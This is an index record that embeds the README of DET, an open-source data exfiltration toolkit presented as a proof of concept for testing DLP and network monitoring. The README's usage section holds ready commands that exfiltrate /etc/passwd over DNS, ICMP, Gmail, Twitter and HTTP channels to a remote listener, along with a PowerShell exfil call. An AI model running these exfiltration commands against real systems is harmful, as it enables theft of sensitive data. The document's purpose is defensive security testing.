{"id":13936930,"url":"https://github.com/sensepost/DET","last_synced_at":"2025-07-19T22:33:14.878Z","repository":{"id":41089207,"uuid":"52802137","full_name":"sensepost/DET","owner":"sensepost","description":"(extensible) Data Exfiltration Toolkit (DET)","archived":false,"fork":false,"pushed_at":"2017-11-03T12:37:04.000Z","size":35,"stargazers_count":821,"open_issues_count":7,"forks_count":190,"subscribers_count":67,"default_branch":"master","last_synced_at":"2024-11-23T09:02:40.518Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/sensepost.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-02-29T15:34:56.000Z","updated_at":"2024-11-21T09:08:55.000Z","dependencies_parsed_at":"2022-07-30T20:18:10.012Z","dependency_job_id":null,"html_url":"https://github.com/sensepost/DET","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sensepost%2FDET","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sensepost%2FDET/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sensepost%2FDET/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sensepost%2FDET/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/sensepost","download_url":"https://codeload.github.com/sensepost/DET/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":226693903,"owners_count":17667757,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-07T23:03:07.580Z","updated_at":"2024-11-27T05:30:41.455Z","avatar_url":"https://github.com/sensepost.png","language":"Python","readme":"DET (extensible) Data Exfiltration Toolkit\n=======\n\nDET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time.  \n\n**This is a Proof of Concept aimed at identifying possible DLP failures. This should never be used to exfiltrate sensitive/live data (say on an assessment)**\n\nThe idea was to create a generic toolkit to plug any kind of protocol/service to test implmented Network Monitoring and Data Leakage Prevention (DLP) solutions configuration, against different data exfiltration techniques.\n\nThe primary repository has now moved to [here](https://github.com/PaulSec/DET).\n\n# Slides\n\nDET has been presented at [BSides Ljubljana](https://bsidesljubljana.si/) on the 9th of March 2016 and the slides will be available here.\nSlides are available [here](https://docs.google.com/presentation/d/11uk6d-xougn3jU1wu4XRM3ZGzitobScSSMUlx0MRTzg).\n\n# Example usage (ICMP plugin)\n\n## Server-side: \n\n[![asciicast](https://asciinema.org/a/18rjfp59rc7w27q7vlzlr96qv.png)](https://asciinema.org/a/18rjfp59rc7w27q7vlzlr96qv)\n\n## Client-side: \n\n[![asciicast](https://asciinema.org/a/9m7ovlh7e4oyztx8e3fxyqsbl.png)](https://asciinema.org/a/9m7ovlh7e4oyztx8e3fxyqsbl)\n\n\n# Usage while combining two channels (Gmail/Twitter)\n\n## Server-side: \n\n[![asciicast](https://asciinema.org/a/9lfpo9m47y5sglvdd1kyb1lwj.png)](https://asciinema.org/a/9lfpo9m47y5sglvdd1kyb1lwj)\n\n## Client-side: \n\n[![asciicast](https://asciinema.org/a/bfstssgptxd41ncces4981cn6.png)](https://asciinema.org/a/bfstssgptxd41ncces4981cn6)\n\n\n# Installation\n\nClone the repo: \n\n```bash\ngit clone https://github.com/sensepost/DET.git\n```\n\nThen: \n\n```bash\npip install -r requirements.txt --user\n```\n\n# Configuration\n\nIn order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP, AES256 encryption\npassphrase and so on). A configuration example file has been provided and is called: ```config-sample.json```\n\n```json\n{\n    \"plugins\": {\n        \"http\": {\n            \"target\": \"192.168.1.101\",\n            \"port\": 8080\n        },\n        \"google_docs\": {\n            \"target\": \"192.168.1.101\",\n            \"port\": 8080,\n        },\n        \"dns\": {\n            \"key\": \"google.com\",\n            \"target\": \"192.168.1.101\",\n            \"port\": 53\n        },\n        \"gmail\": {\n            \"username\": \"dataexfil@gmail.com\",\n            \"password\": \"ReallyStrongPassword\",\n            \"server\": \"smtp.gmail.com\",\n            \"port\": 587\n        },\n        \"tcp\": {\n            \"target\": \"192.168.1.101\",\n            \"port\": 6969\n        },\n        \"udp\": {\n            \"target\": \"192.168.1.101\",\n            \"port\": 6969\n        },\n        \"twitter\": {\n            \"username\": \"PaulWebSec\",\n            \"CONSUMER_TOKEN\": \"XXXXXXXXX\",\n            \"CONSUMER_SECRET\": \"XXXXXXXXX\",\n            \"ACCESS_TOKEN\": \"XXXXXXXXX\",\n            \"ACCESS_TOKEN_SECRET\": \"XXXXXXXXX\"\n        },\n        \"icmp\": {\n            \"target\": \"192.168.1.101\"\n        }\n    },\n    \"AES_KEY\": \"THISISACRAZYKEY\",\n    \"sleep_time\": 10\n}\n```\n\n# Usage\n\n## Help usage\n\n```bash\npython det.py -h\nusage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]\n              [-L]\n\nData Exfiltration Toolkit (SensePost)\n\noptional arguments:\n  -h, --help  show this help message and exit\n  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')\n  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')\n  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')\n  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')\n  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')\n  -L          Server mode\n```\n\n## Server-side: \n\nTo load every plugin:\n\n```bash\npython det.py -L -c ./config.json\n```\n\nTo load *only* twitter and gmail modules: \n\n```bash\npython det.py -L -c ./config.json -p twitter,gmail\n```\n\nTo load every plugin and exclude DNS: \n\n```bash\npython det.py -L -c ./config.json -e dns\n```\n\n## Client-side:\n\nTo load every plugin: \n\n```bash\npython det.py -c ./config.json -f /etc/passwd\n```\n\nTo load *only* twitter and gmail modules: \n\n```bash\npython det.py -c ./config.json -p twitter,gmail -f /etc/passwd\n```\n\nTo load every plugin and exclude DNS: \n\n```bash\npython det.py -c ./config.json -e dns -f /etc/passwd\n```\nAnd in PowerShell (HTTP module): \n\n```powershell\nPS C:\\Users\\user01\\Desktop\u003e\nPS C:\\Users\\user01\\Desktop\u003e . .\\http_exfil.ps1\nPS C:\\Users\\user01\\Desktop\u003e HTTP-exfil 'C:\\path\\to\\file.exe'\n```\n\n# Modules\n\nSo far, DET supports multiple protocols, listed here: \n\n- [X] HTTP(S)\n- [X] ICMP\n- [X] DNS\n- [X] SMTP/IMAP (eg. Gmail)\n- [X] Raw TCP\n- [X] PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))\n\nAnd other \"services\": \n\n- [X] Google Docs (Unauthenticated)\n- [X] Twitter (Direct Messages)\n\n# Experimental modules\n\nSo far, I am busy implementing new modules which are almost ready to ship, including: \n\n- [ ] Skype (95% done)\n- [ ] Tor (80% done)\n- [ ] Github (30/40% done)\n\n# Roadmap\n\n- [X] Add proper encryption (eg. AES-256) Thanks to [ryanohoro](https://github.com/ryanohoro)\n- [X] Compression (extremely important!) Thanks to [chokepoint](https://github.com/chokepoint)\n- [ ] Proper data obfuscation and integrating [Cloakify Toolset Toolset](https://github.com/trycatchhcf/cloakify)\n- [ ] FTP, FlickR [LSB Steganography](https://github.com/RobinDavid/LSB-Steganography) and Youtube modules\n\n# References\n\nSome pretty cool references/credits to people I got inspired by with their project: \n\n- [https://github.com/nullbind/Powershellery/](Powershellery) from Nullbind.\n- [https://github.com/ytisf/PyExfil](PyExfil), truely awesome. \n- [https://github.com/m57/dnsteal](dnsteal) from m57.\n- [https://github.com/3nc0d3r/NaishoDeNusumu](NaishoDeNusumu) from 3nc0d3r.\n- [https://github.com/glennzw/exphil](Exphil) from Glenn Wilkinson.\n- WebExfile from Saif El-Sherei\n\n# Contact/Contributing\n\nYou can reach me on Twitter [@PaulWebSec](https://twitter.com/PaulWebSec). \nFeel free if you want to contribute, clone, fork, submit your PR and so on.\n\n# License\n\nDET is licensed under a [MIT License](https://opensource.org/licenses/MIT). \nPermissions beyond the scope of this license may be available at [info@sensepost.com](info@sensepost.com)\n","funding_links":[],"categories":["Tools","Exfiltration Tools","Python","Network Tools","Exfiltration","Awesome Penetration Testing (\"https://github.com/Muhammd/Awesome-Pentest\")"],"sub_categories":["Network Tools","Zealandia","Forensics","Exfiltration Tools","Purple Team","Tools"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsensepost%2FDET","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsensepost%2FDET","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsensepost%2FDET/lists"}